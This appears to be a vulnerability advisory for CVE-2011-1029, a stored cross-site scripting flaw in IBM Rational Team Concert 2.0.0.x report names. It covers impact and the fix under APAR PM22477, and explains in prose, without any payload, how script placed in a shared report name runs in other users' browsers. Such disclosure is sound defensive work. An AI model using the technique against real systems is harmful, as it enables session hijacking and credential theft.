CVE-2011-1029

Vulnerability

IBM Rational Team Concert (RTC) 2.0.0.x is vulnerable to a stored cross-site scripting (XSS) vulnerability in the shared report functionality. The application fails to properly validate and encode user-supplied data in the report name. An authenticated attacker can create a shared report with a malicious script in its name, which is then stored and rendered to other users. Affected versions include all releases in the 2.0.0.x stream [1].

Exploitation

To exploit this vulnerability, an attacker must have valid credentials and the ability to publish shared reports. The attacker crafts a report name containing arbitrary HTML or JavaScript. When the report is shared, the name is automatically communicated to all team members via Eclipse client RSS feeds. Any user who accesses the shared report (e.g., via the web UI) will execute the injected script in their browser, as the report name is rendered without proper encoding [1].

Impact

Successful exploitation allows the attacker to execute arbitrary script code in the victim's browser session within the context of the RTC application. This can lead to theft of cookie-based authentication credentials, enabling the attacker to hijack the victim's session. If the victim is a privileged user (e.g., project owner), the attacker may gain access to administrative functionality and sensitive data [1].

Mitigation

IBM addressed this issue as part of APAR PM22477. Users should upgrade to a fixed version of IBM Rational Team Concert. The specific fixed version is not detailed in the available reference; however, it is recommended to apply the latest fix pack for the 2.0.0.x stream or upgrade to a newer release that includes the patch [1].